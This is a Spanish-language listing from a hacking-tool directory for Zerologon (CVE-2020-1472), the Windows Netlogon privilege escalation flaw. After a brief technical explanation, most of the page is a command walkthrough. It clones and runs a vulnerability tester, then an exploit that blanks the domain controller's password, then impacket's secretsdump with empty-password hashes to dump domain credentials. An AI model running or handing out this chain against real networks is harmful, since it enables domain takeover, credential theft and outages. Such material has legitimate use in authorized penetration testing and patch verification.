Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Escalada de Privilegios (Zerologon) | Kitploit
Herramientas/GitHubGitHub/murataydemir/cve-2020-1472
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Escalada de Privilegios (Zerologon)

Ver Repositorio
12hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

[CVE-2020-1472] Escalada de privilegios en la llamada de protocolo remoto Netlogon (MS-NRPC) (Zerologon)

El ataque descrito aquí aprovecha fallas en un protocolo de autenticación criptográfica (uso inseguro de AES-CFB8) que demuestra la autenticidad e identidad de un equipo unido al dominio ante el Controlador de Dominio (DC). Debido al uso incorrecto de un modo de operación de AES, es posible falsificar la identidad de cualquier cuenta de equipo (incluida la del propio DC) y establecer una contraseña vacía (simplemente enviando una serie de mensajes Netlogon en los que varios campos se rellenan con ceros) para esa cuenta en el dominio. Esto puede utilizarse después para obtener credenciales de administrador de dominio y, a continuación, restaurar la contraseña original del DC.

Para comprobar CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (example: ./zerologon_tester.py DC01 172.16.208.161)

Para explotar CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (example: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

A continuación, ejecute uno de los siguientes comandos

Formato de ejemplo 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Formato de ejemplo 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Imagen del PoC

La publicación original del blog está disponible aquí
El repositorio original que incluye el script de prueba en Python está disponible aquí
El repositorio original que incluye el script de explotación en Python está disponible aquí

Descargar herramienta